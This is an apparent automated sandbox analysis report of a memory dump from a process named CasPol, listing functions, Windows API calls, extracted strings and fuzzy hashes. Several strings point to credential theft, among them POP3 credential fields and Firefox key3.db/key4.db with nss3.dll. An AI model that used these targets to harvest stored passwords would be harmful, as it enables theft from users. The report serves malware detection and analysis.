                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2126104762-0
                                                                                                                                                                                    • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                    • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                                                                                    Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,004012E4,?), ref: 0040730D
                                                                                                                                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A,?,?,?,?,?,?,004012E4,?), ref: 00407316
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001), ref: 00407371
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1999381814-0
                                                                                                                                                                                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                    Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                    • API String ID: 1297977491-3883738016
                                                                                                                                                                                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                    Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                    Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __aulldvrm$__aullrem
                                                                                                                                                                                    • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                                                                    • API String ID: 643879872-978417875
                                                                                                                                                                                    • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                    • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                    • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                                                                                    Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                    • String ID: user_pref("
                                                                                                                                                                                    • API String ID: 765841271-2487180061
                                                                                                                                                                                    • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                    • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                                                                    • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                                                                    Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                    • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                    Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                    • API String ID: 1631269929-4153097237
                                                                                                                                                                                    • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                                    Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,770145ED,?), ref: 004081B9
                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                    • API String ID: 524865279-2190619648
                                                                                                                                                                                    • Opcode ID: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                                                                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                                    Function 00406B6D Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 86stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                    • strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                    • strlen.MSVCRT ref: 00406BFF
                                                                                                                                                                                    • strlen.MSVCRT ref: 00406C0D
                                                                                                                                                                                    • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                    • String ID: key3.db$key4.db
                                                                                                                                                                                    • API String ID: 581844971-3557030128
                                                                                                                                                                                    • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                                                                    • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                                                                                    Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                    • API String ID: 2300387033-3849865405
                                                                                                                                                                                    • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                                                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                                    Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                    • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                    • String ID: %s (%s)
                                                                                                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                                                                                                    • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                                                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                                    • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                                                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                                    Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                    • API String ID: 125969286-791839006
                                                                                                                                                                                    • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                                                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                                                    Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                      • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                    • String ID: caption$dialog_%d
                                                                                                                                                                                    • API String ID: 2923679083-4161923789
                                                                                                                                                                                    • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                                                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                                                    • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                                                    Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                    • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                    • unknown error, xrefs: 004277B2
                                                                                                                                                                                    • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                    • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                    • API String ID: 3510742995-3035234601
                                                                                                                                                                                    • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                    • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                                                                                    • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                    • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                                                                                    Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                    • API String ID: 2221118986-3608744896
                                                                                                                                                                                    • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                    • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                    • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                                                                    Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                      • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmpmemcpy
